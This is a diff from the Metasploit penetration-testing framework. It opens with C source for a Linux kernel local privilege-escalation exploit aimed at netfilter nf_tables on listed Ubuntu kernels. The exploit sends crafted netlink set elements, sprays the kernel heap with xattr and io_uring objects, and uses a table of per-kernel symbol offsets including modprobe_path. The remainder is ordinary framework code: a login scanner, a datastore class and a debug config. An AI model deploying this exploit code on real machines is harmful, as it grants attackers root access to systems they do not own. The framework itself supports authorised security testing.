+    attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);
+
+    /*** First element ***/
+    attr = set_nested_attr(attr, 0, first_element_size - 4);
+    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
+    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
+    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
+    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);
+
+    /*** Second element ***/
+    attr = set_nested_attr(attr, 0, second_element_size - 4);
+    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
+    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
+    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
+    attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
+    set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);
+
+    /* Last netlink message: End of batch */
+    nlh_batch_end = get_batch_end_nlmsg();
+
+    /* Setup the iovec */
+    memset(iov, 0, sizeof(struct iovec) * 3);
+    iov[0].iov_base = (void *)nlh_batch_begin;
+    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
+    iov[1].iov_base = (void *)nlh_payload;
+    iov[1].iov_len = nlh_payload->nlmsg_len;
+    iov[2].iov_base = (void *)nlh_batch_end;
+    iov[2].iov_len = nlh_batch_end->nlmsg_len;
+
+    /* Prepare the message to send */
+    memset(&msg, 0, sizeof(struct msghdr));
+    msg.msg_name = (void *)&dest_snl;
+    msg.msg_namelen = sizeof(struct sockaddr_nl);
+    msg.msg_iov = iov;
+    msg.msg_iovlen = 3;
+
+    /* Send message */
+    sendmsg(sock, &msg, 0);
+
+    /* Free allocated memory */
+    free(nlh_batch_end);
+    free(nlh_payload);
+    free(nlh_batch_begin);
+}
@@ -0,0 +1,53 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/xattr.h>
+#include <sys/stat.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/mount.h>
+#include "log.h"
+#include "simple_xattr.h"
+
+/**
+ * spray_simple_xattr(): Spray the heap with `simple_xattr` objects
+ * @spray_size: Number of objects to put into `kmalloc-64`
+ */
+void spray_simple_xattr(char *filename, uint32_t spray_size) {
+
+    char attribute_name[ATTRIBUTE_NAME_LEN];
+
+    /* Mount a new tmpfs to be able to set security xattr */
+    if (mkdir("/tmp/tmpfs", S_IRWXU) == -1 && errno != EEXIST)
+    {
+		do_error_exit("mkdir");
+	}
+    if (mount(NULL, "/tmp/tmpfs", "tmpfs", 0, NULL) == -1)
+    {
+		do_error_exit("mount");
+	}
+    
+    /* Create a file to the set attributes */
+
+    int fd = creat(filename, 0644);
+    close(fd);
+
+    for (uint64_t i = 0; i < spray_size; i++) {
+        /* Need that the name is allocated within `kmalloc-256` */
+        snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%215lu-%s", i, XATTR_DELETION_NAME);
+        create_xattr(filename, attribute_name);
+    }
+}
+
+/**
+ * create_xattr(): Add an xattribute to a file with the value "value"
+ * @filename: Name of the concerned file
+ * @attribute_name: Attribute name
+ */
+void create_xattr(const char *filename, char *attribute_name) {
+
+    if (setxattr(filename, attribute_name, XATTR_VALUE, strlen(XATTR_VALUE), XATTR_CREATE) < 0)
+        do_error_exit("setxattr");
+}
@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/io_uring.h>
+
+#include "uring.h"
+#include "log.h"
+#include "util.h"
+
+/**
+ * spray_uring(): Spray different caches of the kernel heap
+ * @spray_size: Size to spray
+ * @fd_buffer: Buffer used to store information about the allocated objects
+ *
+ * This spray is mainly used to spray the cache `kmalloc-64` with `percpu_ref_data` objects
+ */
+void spray_uring(uint32_t spray_size, struct fd_uring *fd_buffer) {
+
+    for (uint64_t i = 0; i < spray_size; i++) {
+
+        fd_buffer[i].params = malloc(sizeof(struct io_uring_params));
+        if (!fd_buffer[i].params)
+            do_error_exit("malloc");
+        memset(fd_buffer[i].params, 0, sizeof(struct io_uring_params));
+
+        fd_buffer[i].fd = io_uring_setup(SPRAY_NB_ENTRIES, fd_buffer[i].params);
+        if (fd_buffer[i].fd < 0)
+            do_error_exit("io_uring_create");
+
+    }
+}
+
+/**
+ * release_uring(): Release percpu_ref_data objects allocated
+ * @fd_buffer: Buffer that stores io_ring_ctx fds
+ * @buffer_size: Size of the previous buffer
+ */
+void release_uring(struct fd_uring *fd_buffer, uint32_t buffer_size) {
+
+    for (uint32_t i = 0; i < buffer_size; i++) {
+        close(fd_buffer[i].fd);
+    }
+    free(fd_buffer);
+}
@@ -0,0 +1,198 @@
+#define _GNU_SOURCE
+#include <stdint.h>
+#include <stdlib.h>
+#include <sched.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <sys/utsname.h>
+
+#include "log.h"
+#include "util.h"
+
+struct kernel_info kernels[] = {
+/*
+ * The structure is declared as:
+ * struct kernel_info {
+ *      const char* kernel_version;
+ *      uint64_t io_ring_ctx_ref_free;
+ *      uint64_t io_rsrc_node_ref_zero;
+ *      uint64_t modprobe_path;
+ * };
+ * The last three fields are the offsets of the corresponding symbols
+ */
+// 22.04 LTS
+    { "5.15.0-24-lowlatency #24-Ubuntu", 0x3e68a0, 0x3e7690, 0x1e8c320 },
+    { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 },
+    { "5.15.0-27-generic #28-Ubuntu", 0x3ddaf0, 0x3de5f0, 0x1e8b320 },
+    { "5.15.0-27-lowlatency #28-Ubuntu", 0x3e6970, 0x3e7760, 0x1e8c2a0 },
+    { "5.15.0-30-generic #31-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
+    { "5.15.0-30-lowlatency #31-Ubuntu", 0x3e78b0, 0x3e86a0, 0x1e8c3e0 },
+    { "5.15.0-33-generic #34-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
+    { "5.15.0-33-lowlatency #34-Ubuntu", 0x3e78c0, 0x3e86b0, 0x1e8c3e0 },
+    { "5.15.0-35-generic #36-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
+    { "5.15.0-35-lowlatency #36-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
+    { "5.15.0-37-generic #39-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
+    { "5.15.0-37-lowlatency #39-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
+    { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
+    { "5.15.0-39-lowlatency #42-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
+    { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
+    { "5.15.0-40-lowlatency #43-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
+    { "5.15.0-41-generic #44-Ubuntu", 0x3e00a0, 0x3e0b90, 0x1e8b660 },
+    { "5.15.0-41-lowlatency #44-Ubuntu", 0x3e8f70, 0x3e9d50, 0x1e8c5e0 },
+// Ubuntu 20.04.4 LTS
+    { "5.11.0-41-generic #45~20.04.1-Ubuntu", 0x37db60, 0x389a80, 0x1c6c2e0 },
+    { "5.11.0-44-generic #48~20.04.2-Ubuntu", 0x37de70, 0x389a90, 0x1c6c2e0 },
+    { "5.13.0-25-generic #26~20.04.1-Ubuntu", 0x389270, 0x389f50, 0x1e6e0a0 },
+    { "5.13.0-27-generic #29~20.04.1-Ubuntu", 0x389280, 0x389f50, 0x1e6e0a0 },
+    { "5.13.0-30-generic #33~20.04.1-Ubuntu", 0x389740, 0x38a700, 0x1e6e220 },
+    { "5.13.0-35-generic #40~20.04.1-Ubuntu", 0x389740, 0x38a700, 0x1e6e220 },
+    { "5.13.0-37-generic #42~20.04.1-Ubuntu", 0x389ef0, 0x38b1b0, 0x1e6e220 },
+    { "5.13.0-39-generic #44~20.04.1-Ubuntu", 0x389ef0, 0x38b400, 0x1e6e220 },
+
+// Ubuntu 21.10
+	{ "5.13.0-27-generic #29-Ubuntu", 0x390b70, 0x391470, 0x1e6e0a0 },
+	{ "5.13.0-30-generic #33-Ubuntu", 0x390d80, 0x391680, 0x1e6e220 },
+	{ "5.13.0-35-generic #40-Ubuntu", 0x390d80, 0x391680, 0x1e6e220 },
+	{ "5.13.0-37-generic #42-Ubuntu", 0x391440, 0x391d40, 0x1e6e220 },
+	{ "5.13.0-37-lowlatency #42-Ubuntu", 0x39a660, 0x39af10, 0x1e6f1a0 },
+	{ "5.13.0-40-generic #45-Ubuntu", 0x3919d0, 0x3922d0, 0x1e6e220 },
+
+};
+
+/**
+ * write_file(): Write a string into a file
+ * @filename: File to write
+ * @text: Text to write
+ */
+void write_file(const char *filename, char *text) {
+
+    int fd = open(filename, O_RDWR);
+
+    write(fd, text, strlen(text));
+    close(fd);
+}
+
+/**
+ * new_ns(): Change the current namespace to access to netfilter and
+ * to be able to write security xattr in a tmpfs
+ */
+void new_ns(void)
+{
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+    char buffer[0x100];
+
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNS))
+        do_error_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");
+
+    if (unshare(CLONE_NEWNET))
+        do_error_exit("unshare(CLONE_NEWNET)");
+    
+    write_file("/proc/self/setgroups", "deny");
+
+    snprintf(buffer, sizeof(buffer), "0 %d 1", uid);
+    write_file("/proc/self/uid_map", buffer);
+    snprintf(buffer, sizeof(buffer), "0 %d 1", gid);
+    write_file("/proc/self/gid_map", buffer);
+}
+
+/**
+ * set_cpu_affinity(): Pin a process to a CPU
+ * @cpu_n: CPU to use
+ * @pid: pid of the process to attach
+ */
+void set_cpu_affinity(int cpu_n, pid_t pid) {
+    cpu_set_t set;
+
+    CPU_ZERO(&set);
+    CPU_SET(cpu_n, &set);
+
+    if (sched_setaffinity(pid, sizeof(set), &set) < 0)
+        do_error_exit("sched_setaffinity");
+}
+
+/**
+ * generate_table_name(): Generate a name for a netfilter table
+ * @table_name: Buffer used to store the new name
+ */
+void generate_table_name(char table_name[8]) {
+    static int attempt = 0;
+    snprintf(table_name, 8, "t%d", attempt);
+    attempt++;
+}
+
+/**
+ * generate_tmp_filename(): Generate a filename to be used with
+ *  the xattr spray
+ *
+ * Return: New generated filename
+ */
+char *generate_tmp_filename(void) {
+    static char buffer[FILENAME_MAX_LEN];
+    static uint64_t counter = 0;
+
+    snprintf(buffer, FILENAME_MAX_LEN, "/tmp/tmpfs/file%lu", counter);
+    counter++;
+
+    return buffer;
+}
+
+/**
+ * get_kernel_version(): Returns the kernel version string.
+ * Return: a pointer to a struct utsname returned by the uname POSIX function
+ */
+struct utsname* get_kernel_version() {
+  struct utsname* u = (struct utsname*) malloc(sizeof(struct utsname));
+  int rv = uname(u);
+  if (rv != 0) {
+    do_error_exit("uname");
+  }
+  return u;
+}
+
+// Will be overwritten by detect_versions
+int kernel = -1;
+
+/**
+ * detect_versions(): Returns 0, and sets kernel if the exploit
+ * has the offsets needed to exploit the running kernel
+ * Return: 0 if the offsets are available, -1 otherwise
+ */
+int detect_versions() {
+  struct utsname* u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u->machine, "64") == NULL) {
+    printf("[-] system is not using a 64-bit kernel\n");
+    free(u);
+    return -1;
+  }
+
+  if (strstr(u->version, "-Ubuntu") == NULL) {
+    printf("[-] system is not using an Ubuntu kernel\n");
+    free(u);
+    return -1;
+  }
+
+  char *u_ver = strtok(u->version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u->release,
+           u_ver);
+
+  free(u);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      printf("[+] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return 0;
+    }
+  }
+
+  printf("[-] kernel version '%s' not recognized\n", kernel_version);
+  return -1;
+}
@@ -0,0 +1,27 @@
+{
+    // Example file to showcase how to debug Metasploit using the ruby/debug gem along with the
+    // ruby/vscode-rdbg VSCode plugin. This file will be used by VSCode and the ruby/vscode-rdbg
+    // plugin to figure out how to connect to setup the rdbg instance for msfconsole and then connect
+    // to it properly, allowing you to debug Metasploit and more specifically msfconsole and any associated
+    // modules that you run within it.
+    "version": "0.2.0",
+    "configurations": [
+        {
+            "type": "rdbg",
+            "name": "Debug current file with rdbg",
+            "request": "launch",
+            "script": "${cwd}/msfconsole",
+            "args": [],
+            "askParameters": true,
+            "localfs": true,
+            "debugPort": "127.0.0.1:55634"
+        },
+        {
+            "type": "rdbg",
+            "name": "Attach with rdbg",
+            "request": "attach",
+            "localfs": true,
+            "debugPort": "127.0.0.1:55634"
+        }
+    ]
+}
@@ -39,6 +39,8 @@ def identify_hash(hash)
    return 'qnx,sha256'
  when hash.start_with?('@m@') && hash.length == 52
    return 'qnx,md5'
+  when hash.start_with?('$y$') && hash.split('$').last.length == 43
+    return 'yescrypt'
  when hash.start_with?('_') && hash.length == 20
    return 'des,bsdi,crypt'
  when hash =~ %r{^[./\dA-Za-z]{13}$} # hash.length == 13
@@ -15,6 +15,7 @@ module Metasploit
        DEFAULT_REALM        = nil
        DEFAULT_PORT         = 80
        DEFAULT_SSL_PORT     = 443
+        DEFAULT_HTTP_SUCCESS_CODES = [ 200, 201 ].append(*(300..309))
        LIKELY_PORTS         = [ 80, 443, 8000, 8080 ]
        LIKELY_SERVICE_NAMES = [ 'http', 'https' ]
        PRIVATE_TYPES        = [ :password ]
@@ -177,6 +178,12 @@ module Metasploit
        # @return [String]
        attr_accessor :http_password

+        # @!attribute http_success_codes
+        # @return [Array][Int] list of valid http response codes
+        attr_accessor :http_success_codes
+
+
+        validate :validate_http_codes

        validates :uri, presence: true, length: { minimum: 1 }

@@ -294,7 +301,7 @@ module Metasploit

          begin
            response = send_request('credential'=>credential, 'uri'=>uri, 'method'=>method)
-            if response && response.code == 200
+            if response && http_success_codes.include?(response.code)
              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response.headers)
            end
          rescue Rex::ConnectionError => e
@@ -365,6 +372,7 @@ module Metasploit
          self.connection_timeout ||= 20
          self.uri = '/' if self.uri.blank?
          self.method = 'GET' if self.method.blank?
+          self.http_success_codes = DEFAULT_HTTP_SUCCESS_CODES if self.http_success_codes.nil?

          # Note that this doesn't cover the case where ssl is unset and
          # port is something other than a default. In that situtation,
@@ -396,6 +404,15 @@ module Metasploit
          (self.uri.to_s + "/" + target_uri.to_s).gsub(/\/+/, '/')
        end

+        private
+
+        def validate_http_codes
+          errors.add(:http_success_codes, "HTTP codes must be an Array") unless @http_success_codes.is_a?(Array)
+          @http_success_codes.each do |code|
+            next if code >= 200 && code < 400
+            errors.add(:http_success_codes, "Invalid HTTP code provided #{code}")
+          end
+        end
      end
    end
  end
@@ -128,11 +128,13 @@ module Metasploit
              else
                status = Metasploit::Model::Login::Status::INCORRECT
            end
-          rescue ::Rex::ConnectionError, Errno::EINVAL, RubySMB::Error::NetBiosSessionService => e
+          rescue ::Rex::ConnectionError, Errno::EINVAL, RubySMB::Error::NetBiosSessionService, RubySMB::Error::NegotiationFailure, RubySMB::Error::CommunicationError  => e
            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
            proof = e
-          rescue RubySMB::Error::UnexpectedStatusCode => e
+          rescue RubySMB::Error::UnexpectedStatusCode => _e
            status = Metasploit::Model::Login::Status::INCORRECT
+          rescue RubySMB::Error::RubySMBError => _e
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          ensure
            client.disconnect! if client
          end
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.17"
+      VERSION = "6.2.22"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -555,7 +555,11 @@ class ReadableText
        ])

    mod.options.sorted.each do |name, opt|
-      val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+        val = mod.datastore[name]
+      else
+        val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      end

      next unless Msf::OptCondition.show_option(mod, opt)
      next if (opt.advanced?)
@@ -603,7 +607,11 @@ class ReadableText
    mod.options.sorted.each do |name, opt|
      next unless opt.advanced?
      next unless Msf::OptCondition.show_option(mod, opt)
-      val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+        val = mod.datastore[name]
+      else
+        val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      end
      tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
    end

@@ -628,7 +636,11 @@ class ReadableText

    mod.options.sorted.each do |name, opt|
      next unless opt.evasion?
-      val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+        val = mod.datastore[name]
+      else
+        val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
+      end
      tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
    end

@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Sessions
+
+    ###
+    #
+    # This class provides the ability to receive a custom stage callback
+    #
+    ###
+    class Custom
+
+      #
+      # This interface supports basic interaction.
+      #
+      include Msf::Session
+      include Msf::Session::Basic
+
+      attr_accessor :arch
+      attr_accessor :platform
+
+      #
+      # Returns the type of session.
+      #
+      def self.type
+        "custom"
+      end
+
+      def initialize(rstream, opts = {})
+        super
+        self.platform ||= ""
+        self.arch     ||= ""
+        datastore = opts[:datastore]
+      end
+
+      def self.create_session(rstream, opts = {})
+        Msf::Sessions::Custom.new(rstream, opts)
+      end
+
+      def process_autoruns(datastore)
+        cleanup
+      end
+
+      def cleanup
+        print_good("Custom stage sent; session has been closed")
+        if rstream
+          # this is also a best-effort
+          rstream.close rescue nil
+          rstream = nil
+        end
+      end
+
+      #
+      # Returns the session description.
+      #
+      def desc
+        "Custom"
+      end
+
+      def self.can_cleanup_files
+        false
+      end
+
+      #
+      # Calls the class method
+      #
+      def type
+        self.class.type
+      end
+    end
+  end
+end
@@ -9,6 +9,20 @@ module Msf
 ###
 class DataStore < Hash

+  # Temporary forking logic for conditionally using the {Msf::ModuleDatastoreWithFallbacks} implementation.
+  #
+  # This method replaces the default `ModuleDataStore.new` with the ability to instantiate the `ModuleDataStoreWithFallbacks`
+  # class instead, if the feature is enabled
+  def self.new
+    if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+      return Msf::DataStoreWithFallbacks.new
+    end
+
+    instance = allocate
+    instance.send(:initialize)
+    instance
+  end
+
  #
  # Initializes the data store's internal state.
  #
@@ -0,0 +1,547 @@
+# -*- coding: binary -*-
+module Msf
+
+###
+#
+# The data store is just a bitbucket that holds keyed values. It is used
+# by various classes to hold option values and other state information.
+#
+###
+class DataStoreWithFallbacks
+
+  # The global framework datastore doesn't currently import options
+  # For now, store an ad-hoc list of keys that the shell handles
+  #
+  # This list could be removed if framework's bootup sequence registers
+  # these as datastore options
+  GLOBAL_KEYS = %w[
+    ConsoleLogging
+    LogLevel
+    MinimumRank
+    SessionLogging
+    TimestampOutput
+    Prompt
+    PromptChar
+    PromptTimeFormat
+    MeterpreterPrompt
+    SessionTlvLogging
+  ]
+
+  #
+  # Initializes the data store's internal state.
+  #
+  def initialize
+    @options     = Hash.new
+    @aliases     = Hash.new
+
+    # default values which will be referenced when not defined by the user
+    @defaults = Hash.new
+
+    # values explicitly defined, which take precedence over default values
+    @user_defined = Hash.new
+  end
+
+  # @return [Hash{String => Msf::OptBase}] The options associated with this datastore. Used for validating values/defaults/etc
+  attr_accessor :options
+
+  #
+  # Returns a hash of user-defined datastore values. The returned hash does
+  # not include default option values.
+  #
+  # @return [Hash<String, Object>] values explicitly defined on the data store which will override any default datastore values
+  attr_accessor :user_defined
+
+  #
+  # Was this entry actually set or just using its default
+  #
+  # @return [TrueClass, FalseClass]
+  def default?(key)
+    search_for(key).default?
+  end
+
+  #
+  # Clears the imported flag for the supplied key since it's being set
+  # directly.
+  #
+  def []=(k, v)
+    k = find_key_case(k)
+
+    opt = @options[k]
+    unless opt.nil?
+      if opt.validate_on_assignment?
+        unless opt.valid?(v, check_empty: false)
+          raise Msf::OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"])
+        end
+        v = opt.normalize(v)
+      end
+    end
+
+    @user_defined[k] = v
+  end
+
+  #
+  # Case-insensitive wrapper around hash lookup
+  #
+  def [](k)
+    search_result = search_for(k)
+
+    search_result.value
+  end
+
+  #
+  # Case-insensitive wrapper around store; Skips option validation entirely
+  #
+  def store(k,v)
+    @user_defined[find_key_case(k)] = v
+  end
+
+  #
+  # Updates a value in the datastore with the specified name, k, to the
+  # specified value, v. Skips option validation entirely.
+  #
+  def update_value(k, v)
+    store(k, v)
+  end
+
+  #
+  # unset the current key from the datastore
+  # @param [String] key The key to search for
+  def unset(key)
+    k = find_key_case(key)
+    search_result = search_for(k)
+    @user_defined.delete(k)
+
+    search_result.value
+  end
+
+  # @deprecated use #{unset} instead, or set the value explicitly to nil
+  # @param [String] key The key to search for
+  def delete(key)
+    unset(key)
+  end
+
+  #
+  # Removes an option and any associated value
+  #
+  # @param [String] name the option name
+  # @return [nil]
+  def remove_option(name)
+    k = find_key_case(name)
+    @user_defined.delete(k)
+    @aliases.delete_if { |_, v| v.casecmp?(k) }
+    @options.delete_if { |option_name, _v| option_name.casecmp?(k) || option_name.casecmp?(name) }
+
+    nil
+  end
+
+  #
+  # This method is a helper method that imports the default value for
+  # all of the supplied options
+  #
+  def import_options(options, imported_by = nil, overwrite = true)
+    options.each_option do |name, option|
+      if self.options[name].nil? || overwrite
+        key = name
+        option.aliases.each do |a|
+          @aliases[a.downcase] = key.downcase
+        end
+        @options[key] = option
+      end
+    end
+  end
+
+  #
+  # Imports option values from a whitespace separated string in
+  # VAR=VAL format.
+  #
+  def import_options_from_s(option_str, delim = nil)
+    hash = {}
+
+    # Figure out the delimeter, default to space.
+    if (delim.nil?)
+      delim = /\s/
+
+      if (option_str.split('=').length <= 2 or option_str.index(',') != nil)
+        delim = ','
+      end
+    end
+
+    # Split on the delimeter
+    option_str.split(delim).each { |opt|
+      var, val = opt.split('=')
+
+      next if (var =~ /^\s+$/)
+
+
+      # Invalid parse?  Raise an exception and let those bastards know.
+      if (var == nil or val == nil)
+        var = "unknown" if (!var)
+
+        raise Rex::ArgumentParseError, "Invalid option specified: #{var}",
+          caller
+      end
+
+      # Remove trailing whitespaces from the value
+      val.gsub!(/\s+$/, '')
+
+      # Store the value
+      hash[var] = val
+    }
+
+    merge!(hash)
+  end
+
+  #
+  # Imports values from a hash and stores them in the datastore.
+  #
+  # @deprecated use {#merge!} instead
+  # @return [nil]
+  def import_options_from_hash(option_hash, imported = true, imported_by = nil)
+    merge!(option_hash)
+  end
+
+  # Update defaults from a hash. These merged values are not validated by default.
+  #
+  # @param [Hash<String, Object>] hash The default values that should be used by the datastore
+  # @param [Object] imported_by Who imported the defaults, not currently used
+  # @return [nil]
+  def import_defaults_from_hash(hash, imported_by:)
+    @defaults.merge!(hash)
+  end
+
+  # TODO: Doesn't normalize data in the same vein as:
+  # https://github.com/rapid7/metasploit-framework/pull/6644
+  # @deprecated Use {#import_options}
+  def import_option(key, val, imported = true, imported_by = nil, option = nil)
+    store(key, val)
+
+    if option
+      option.aliases.each do |a|
+        @aliases[a.downcase] = key.downcase
+      end
+    end
+    @options[key] = option
+  end
+
+  # @return [Array<String>] The array of user defined datastore values, and registered option names
+  def keys
+    (@user_defined.keys + @options.keys).uniq(&:downcase)
+  end
+
+  # @return [Integer] The length of the registered keys
+  def length
+    keys.length
+  end
+
+  alias count length
+  alias size length
+
+  # @param [String] key
+  # @return [TrueClass, FalseClass] True if the key is present in the user defined values, or within registered options. False otherwise.
+  def key?(key)
+    matching_key = find_key_case(key)
+    keys.include?(matching_key)
+  end
+
+  alias has_key? key?
+  alias include? key?
+  alias member? key?
+
+  #
+  # Serializes the options in the datastore to a string.
+  #
+  def to_s(delim = ' ')
+    str = ''
+
+    keys.sort.each { |key|
+      str << "#{key}=#{self[key]}" + ((str.length) ? delim : '')
+    }
+
+    str
+  end
+
+  # Override Hash's to_h method so we can include the original case of each key
+  # (failing to do this breaks a number of places in framework and pro that use
+  # serialized datastores)
+  def to_h
+    datastore_hash = {}
+    self.keys.each do |k|
+      datastore_hash[k.to_s] = self[k].to_s
+    end
+    datastore_hash
+  end
+
+  # Hack on a hack for the external modules
+  def to_external_message_h
+    datastore_hash = {}
+
+    array_nester = ->(arr) do
+      if arr.first.is_a? Array
+        arr.map &array_nester
+      else
+        arr.map { |item| item.to_s.dup.force_encoding('UTF-8') }
+      end
+    end
+
+    self.keys.each do |k|
+      # TODO arbitrary depth
+      if self[k].is_a? Array
+        datastore_hash[k.to_s.dup.force_encoding('UTF-8')] = array_nester.call(self[k])
+      else
+        datastore_hash[k.to_s.dup.force_encoding('UTF-8')] = self[k].to_s.dup.force_encoding('UTF-8')
+      end
+    end
+    datastore_hash
+  end
+
+  #
+  # Persists the contents of the data store to a file
+  #
+  def to_file(path, name = 'global')
+    ini = Rex::Parser::Ini.new(path)
+
+    ini.add_group(name)
+
+    # Save all user-defined options to the file.
+    @user_defined.each_pair { |k, v|
+      ini[name][k] = v
+    }
+
+    ini.to_file(path)
+  end
+
+  #
+  # Imports datastore values from the specified file path using the supplied
+  # name
+  #
+  def from_file(path, name = 'global')
+    begin
+      ini = Rex::Parser::Ini.from_file(path)
+    rescue
+      return
+    end
+
+    if ini.group?(name)
+      merge!(ini[name])
+    end
+  end
+
+  #
+  # Return a copy of this datastore. Only string values will be duplicated, other values
+  # will share the same reference
+  # @return [Msf::DataStore] a new datastore instance
+  def copy
+    new_instance = self.class.new
+    new_instance.copy_state(self)
+    new_instance
+  end
+
+  #
+  # Merge the other object into the current datastore's aliases and imported hashes
+  #
+  # @param [Msf::Datastore, Hash] other
+  def merge!(other)
+    if other.is_a?(DataStoreWithFallbacks)
+      self.aliases.merge!(other.aliases)
+      self.options.merge!(other.options)
+      self.defaults.merge!(other.defaults)
+      other.user_defined.each do |k, v|
+        @user_defined[find_key_case(k)] = v
+      end
+    else
+      other.each do |k, v|
+        self.store(k, v)
+      end
+    end
+
+    self
+  end
+
+  alias update merge!
+
+  #
+  # Reverse Merge the other object into the current datastore's aliases and imported hashes
+  # Equivalent to ActiveSupport's reverse_merge! functionality.
+  #
+  # @param [Msf::Datastore] other
+  def reverse_merge!(other)
+    raise ArgumentError, "invalid error type #{other.class}, expected ::Msf::DataStore" unless other.is_a?(Msf::DataStoreWithFallbacks)
+
+    copy_state(other.merge(self))
+  end
+
+  #
+  # Override merge to ensure we merge the aliases and imported hashes
+  #
+  # @param [Msf::Datastore,Hash] other
+  def merge(other)
+    ds = self.copy
+    ds.merge!(other)
+  end
+
+  #
+  # Completely clear all values in the data store
+  #
+  def clear
+    self.options.clear
+    self.aliases.clear
+    self.defaults.clear
+    self.user_defined.clear
+
+    self
+  end
+
+  #
+  # Overrides the builtin 'each' operator to avoid the following exception on Ruby 1.9.2+
+  #    "can't add a new key into hash during iteration"
+  #
+  def each(&block)
+    list = []
+    self.keys.sort.each do |sidx|
+      list << [sidx, self[sidx]]
+    end
+    list.each(&block)
+  end
+
+  alias each_pair each
+
+  def each_key(&block)
+    self.keys.each(&block)
+  end
+
+  #
+  # Case-insensitive key lookup
+  #
+  # @return [String]
+  def find_key_case(k)
+    # Scan each alias looking for a key
+    search_k = k.downcase
+    if self.aliases.has_key?(search_k)
+      search_k = self.aliases[search_k]
+    end
+
+    # Check to see if we have an exact key match - otherwise we'll have to search manually to check case sensitivity
+    if @user_defined.key?(search_k) || options.key?(search_k)
+      return search_k
+    end
+
+    # Scan each key looking for a match
+    each_key do |rk|
+      if rk.casecmp(search_k) == 0
+        return rk
+      end
+    end
+
+    # Fall through to the non-existent value
+    k
+  end
+
+  # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
+  #
+  # @param [String] key The key to search for
+  # @return [DataStoreSearchResult]
+  def search_for(key)
+    k = find_key_case(key)
+    return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
+
+    option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
+    if option
+      # If the key isn't present - check any additional fallbacks that have been registered with the option.
+      # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
+      # generic 'Username' fallback
+      option.fallbacks.each do |fallback|
+      fallback_search = search_for(fallback)
+        if fallback_search.found?
+          return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
+        end
+      end
+    end
+
+    # Checking for imported default values, ignoring case again
+    imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
+    return search_result(:imported_default, imported_default_match.last) if imported_default_match
+    return search_result(:option_default, option.default) if option
+
+    search_result(:not_found, nil)
+  end
+
+  protected
+
